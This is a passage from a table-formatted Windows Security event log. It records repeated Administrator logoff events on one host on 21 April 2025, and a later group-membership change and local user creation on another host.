&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2cc95c'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:54 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 753       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2ce514'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:57 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 757       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2cbfad'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:57 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 758       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x27c849'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:49:57 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 759       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2999ce'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:50:07 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 790       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2d4f68'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:50:07 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 791       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2d793e'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:50:10 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4634     &#9474; 795       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; LogonType: 3                     &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x2d03de'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 10:50:12 &#9474; &#8227; User Logoff Event                 &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4647     &#9474; 796       &#9474; DESKTOP-8IRBDLK &#9474; TargetUserName: Administrator    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; TargetUserSid: S-1-5-21-387158   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; 2759-1638593395-315824688-500    &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: DESKTOP-8IRB   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; DLK                              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetLogonId: '0x1818e1'        &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:42:54 &#9474; &#8227; A Member Was Added to             &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4728     &#9474; 42        &#9474; WIN-CT4CCI7FTCO &#9474; MemberName: '-'                  &#9474;
&#9474;                     &#9474; a Security-Enabled Global           &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; MemberSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474; Group                               &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-504        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectDomainName: ''            &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: MINWINPC       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserSid: S-1-5-18         &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetUserName: None             &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetSid: S-1-5-21-3871582759   &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; -1638593395-315824688-513        &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectLogonId: '0x3e7'          &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; SubjectUserName: MINWINPC$       &#9474;
&#9500;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9532;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9508;
&#9474; 2025-04-21 17:42:54 &#9474; &#8227; Local User Creation               &#9474; 1     &#9474; Microsoft-Windows-Security-Aud &#9474; 4720     &#9474; 43        &#9474; WIN-CT4CCI7FTCO &#9474; UserWorkstations: '%%1793'       &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474; iting                          &#9474;          &#9474;           &#9474;                 &#9474; PrivilegeList: '-'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; OldUacValue: '0x0'               &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; NewUacValue: '0x15'              &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; UserPrincipalName: '-'           &#9474;
&#9474;                     &#9474;                                     &#9474;       &#9474;                                &#9474;          &#9474;           &#9474;                 &#9474; TargetDomainName: MINWINPC       &#9474;
